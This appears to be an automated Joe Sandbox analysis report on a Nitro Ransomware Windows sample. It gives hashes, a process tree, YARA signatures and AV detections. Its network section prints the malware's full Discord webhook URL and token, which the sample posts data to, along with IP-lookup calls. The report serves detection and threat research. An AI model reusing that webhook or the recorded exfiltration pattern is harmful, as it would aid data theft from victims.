Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12057ad2.exe

Overview

General Information

Sample Name:12057ad2.exe
Analysis ID:709270
MD5:716bf12f1b7b6b04f1acf6f8ae1eb4bb
SHA1:c172a657fd1a8759beccff5b144f1cb20033008a
SHA256:9e801ce8af98b3c03423f3f9b3d9b2f36aad15a63f21523210a9517f12057ad2
Tags:exeRansomware
Infos:

Detection

NitroRansomware
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected Nitro Ransomware
Machine Learning detection for sample
May check the online IP address of the machine
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • 12057ad2.exe (PID: 4920 cmdline: "C:\Users\user\Desktop\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
    • cmd.exe (PID: 4572 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 1308 cmdline: wmic csproduct get uuid MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
  • 12057ad2.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\Temp\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
  • 12057ad2.exe (PID: 2612 cmdline: "C:\Users\user\AppData\Local\Temp\12057ad2.exe" MD5: 716BF12F1B7B6B04F1ACF6F8AE1EB4BB)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
12057ad2.exeMALWARE_Win_NitroDetects Nitro RansomwareditekSHen
  • 0x5394:$x1: .givemenitro
  • 0x5889:$x1: .givemenitro
  • 0x5676:$x2: Nitro Ransomware
  • 0xed54:$x3: \NitroRansomware.pdb
  • 0x4390:$x4: NitroRansomware
  • 0x4648:$x4: NitroRansomware
  • 0x475c:$x4: NitroRansomware
  • 0x4d13:$x4: NitroRansomware
  • 0x4d33:$x4: NitroRansomware
  • 0x4d88:$x4: NitroRansomware
  • 0x67aa:$x4: NitroRansomware
  • 0x6dc5:$x4: NitroRansomware
  • 0xed3b:$x4: NitroRansomware
  • 0xed55:$x4: NitroRansomware
  • 0xefd4:$x4: NitroRansomware
  • 0xf044:$x4: NitroRansomware
  • 0xf108:$x4: NitroRansomware
  • 0xf150:$x4: NitroRansomware
  • 0x596b:$s1: Valid nitro code was received
  • 0x5b23:$s2: Discord nitro
  • 0x5cd7:$s2: Discord Nitro
12057ad2.exeRAN_Nitro_Aug_2021_1Detect Nitro ransomwareArkbird_SOLG
  • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
  • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
  • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
  • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\12057ad2.exeMALWARE_Win_NitroDetects Nitro RansomwareditekSHen
  • 0x5394:$x1: .givemenitro
  • 0x5889:$x1: .givemenitro
  • 0x5676:$x2: Nitro Ransomware
  • 0xed54:$x3: \NitroRansomware.pdb
  • 0x4390:$x4: NitroRansomware
  • 0x4648:$x4: NitroRansomware
  • 0x475c:$x4: NitroRansomware
  • 0x4d13:$x4: NitroRansomware
  • 0x4d33:$x4: NitroRansomware
  • 0x4d88:$x4: NitroRansomware
  • 0x67aa:$x4: NitroRansomware
  • 0x6dc5:$x4: NitroRansomware
  • 0xed3b:$x4: NitroRansomware
  • 0xed55:$x4: NitroRansomware
  • 0xefd4:$x4: NitroRansomware
  • 0xf044:$x4: NitroRansomware
  • 0xf108:$x4: NitroRansomware
  • 0xf150:$x4: NitroRansomware
  • 0x596b:$s1: Valid nitro code was received
  • 0x5b23:$s2: Discord nitro
  • 0x5cd7:$s2: Discord Nitro
C:\Users\user\AppData\Local\Temp\12057ad2.exeRAN_Nitro_Aug_2021_1Detect Nitro ransomwareArkbird_SOLG
  • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
  • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
  • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
  • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
  • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitroRansomwareYara detected Nitro RansomwareJoe Security
    00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitroRansomwareYara detected Nitro RansomwareJoe Security
      00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NitroRansomwareYara detected Nitro RansomwareJoe Security
        00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NitroRansomwareYara detected Nitro RansomwareJoe Security
          00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitroRansomwareYara detected Nitro RansomwareJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.12057ad2.exe.c60000.0.unpackMALWARE_Win_NitroDetects Nitro RansomwareditekSHen
            • 0x5394:$x1: .givemenitro
            • 0x5889:$x1: .givemenitro
            • 0x5676:$x2: Nitro Ransomware
            • 0xed54:$x3: \NitroRansomware.pdb
            • 0x4390:$x4: NitroRansomware
            • 0x4648:$x4: NitroRansomware
            • 0x475c:$x4: NitroRansomware
            • 0x4d13:$x4: NitroRansomware
            • 0x4d33:$x4: NitroRansomware
            • 0x4d88:$x4: NitroRansomware
            • 0x67aa:$x4: NitroRansomware
            • 0x6dc5:$x4: NitroRansomware
            • 0xed3b:$x4: NitroRansomware
            • 0xed55:$x4: NitroRansomware
            • 0xefd4:$x4: NitroRansomware
            • 0xf044:$x4: NitroRansomware
            • 0xf108:$x4: NitroRansomware
            • 0xf150:$x4: NitroRansomware
            • 0x596b:$s1: Valid nitro code was received
            • 0x5b23:$s2: Discord nitro
            • 0x5cd7:$s2: Discord Nitro
            0.0.12057ad2.exe.c60000.0.unpackRAN_Nitro_Aug_2021_1Detect Nitro ransomwareArkbird_SOLG
            • 0x286d:$s1: 1F 1A 28 88 00 00 0A 0A 06 72 4B 14 00 70 28 15 00 00 0A 80 32 00 00 04 28 39 00 00 06 7E 32 00 00 04 6F BB 00 00 0A 00 7E 2F 00 00 04 16 7E 32 00 00 04 7E 30 00 00 04 7E 31 00 00 04 60 28 2F ...
            • 0x1ff9:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
            • 0x202d:$s2: 02 7B 24 00 00 04 72 DF 00 00 70 28 1B 00 00
            • 0x1bbd:$s3: 1F 1A 28 88 00 00 0A 0A 1F 1C 28 88 00 00 0A 0B 7E 21 00 00 04 06 72 70 0C 00 70 28 15 00 00 0A 6F 16 00 00 0A 00 7E 21 00
            • 0x26f9:$s4: 7E 4E 00 00 0A 0A 00 72 B3 13 00 70 73 42 00 00 06 0B 00 07 72 C3 13 00 70 6F 44 00 00 06 0C 08 17 8D 7F 00 00 01 25 16 1F 0A 9D 6F B6 00 00 0A 1C 9A 0A 00 DE 0B 07 2C 07 07 6F 42 00 00 0A
            • 0x27c5:$s5: 7E 4E 00 00 0A 0A 00 73 9A 00 00 0A 0B 00 07 72 1F 14 00 70 6F 9C 00 00 0A 0C 08 6F 9D 00 00 0A 6F B8 00 00 0A 6F B9 00 00 0A 0D 09 6F BA 00 00 0A 0A

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 12057ad2.exeReversingLabs: Detection: 92%
            Source: 12057ad2.exeVirustotal: Detection: 61%Perma Link
            Source: 12057ad2.exeMetadefender: Detection: 54%Perma Link
            Antivirus / Scanner detection for submitted sample
            Source: 12057ad2.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeAvira: detection malicious, Label: HEUR/AGEN.1232324
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeReversingLabs: Detection: 92%
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeMetadefender: Detection: 54%Perma Link
            Machine Learning detection for sample
            Source: 12057ad2.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeJoe Sandbox ML: detected
            Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49700 version: TLS 1.2
            Source: 12057ad2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\asbib\Desktop\Nitro-Ransomware-master\NitroRansomware\obj\Debug\NitroRansomware.pdb source: 12057ad2.exe, 12057ad2.exe.0.dr

            Networking

            barindex
            May check the online IP address of the machine
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: C:\Users\user\Desktop\12057ad2.exeDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 291Expect: 100-continueConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 145Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 133Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 147Expect: 100-continue
            Source: global trafficHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 196Expect: 100-continueConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
            Source: Joe Sandbox ViewIP Address: 54.91.59.199 54.91.59.199
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://canary.discord.com
            Source: 12057ad2.exe, 00000000.00000002.574008966.00000000014F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
            Source: 12057ad2.exe, 00000000.00000002.574630053.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: 12057ad2.exe, 00000004.00000002.576801288.0000000006412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: 12057ad2.exe, 12057ad2.exe.0.drString found in binary or memory: https://api.ipify.org
            Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com
            Source: 12057ad2.exe, 12057ad2.exe.0.drString found in binary or memory: https://canary.discord.com/api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD
            Source: 12057ad2.exe, 00000000.00000002.579820398.000000000348D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com4zkd
            Source: 12057ad2.exe, 12057ad2.exe.0.drString found in binary or memory: https://discord.com/api/v8/entitlements/gift-codes/
            Source: 12057ad2.exe, 12057ad2.exe.0.drString found in binary or memory: https://i.ibb.co/0frTD92/discord-avatar-512.png
            Source: unknownHTTP traffic detected: POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: canary.discord.comContent-Length: 291Expect: 100-continueConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: api.ipify.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49700 version: TLS 1.2
            Source: 12057ad2.exe, 00000000.00000002.573245746.000000000142A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Yara detected Nitro Ransomware
            Source: Yara matchFile source: 00000004.00000002.572902920.000000000079F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.574148014.00000000028C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.572197724.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.303846489.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 12057ad2.exe PID: 4920, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 12057ad2.exe PID: 4788, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 12057ad2.exe PID: 2612, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 12057ad2.exe, type: SAMPLEMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: 12057ad2.exe, type: SAMPLEMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: Detects Nitro Ransomware Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: Detect Nitro ransomware Author: Arkbird_SOLG
            Source: 12057ad2.exe, type: SAMPLEMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: 12057ad2.exe, type: SAMPLEMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: 0.0.12057ad2.exe.c60000.0.unpack, type: UNPACKEDPEMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: MALWARE_Win_Nitro author = ditekSHen, description = Detects Nitro Ransomware
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, type: DROPPEDMatched rule: RAN_Nitro_Aug_2021_1 date = 2021-08-12, hash5 = dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b, hash4 = d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0, hash3 = 89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559, hash2 = 6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf, hash1 = 1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13, author = Arkbird_SOLG, description = Detect Nitro ransomware, adversary = -, reference = https://bazaar.abuse.ch/browse/tag/NitroRansomware/, tlp = white
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A62200_2_012A6220
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A4CC70_2_012A4CC7
            Source: C:\Users\user\Desktop\12057ad2.exeCode function: 0_2_012A62100_2_012A6210
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DD38C4_2_009DD38C
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DD3804_2_009DD380
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DF8514_2_009DF851
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DB9244_2_009DB924
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DDDF04_2_009DDDF0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_009DDE004_2_009DDE00
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06AC55084_2_06AC5508
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06AC42E44_2_06AC42E4
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE0B204_2_06CE0B20
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE39804_2_06CE3980
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE99B04_2_06CE99B0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CEA6E04_2_06CEA6E0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CEABA84_2_06CEABA8
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE99A14_2_06CE99A1
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFD38C5_2_00DFD38C
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFF8515_2_00DFF851
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFB9245_2_00DFB924
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFDDF05_2_00DFDDF0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_00DFDE005_2_00DFDE00
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_06B255085_2_06B25508
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_06B242E45_2_06B242E4
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808A2185_2_0808A218
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_080805985_2_08080598
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808A2085_2_0808A208
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808B4105_2_0808B410
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_0808AF485_2_0808AF48
            Source: C:\Users\user\Desktop\12057ad2.exeProcess Stats: CPU usage > 98%
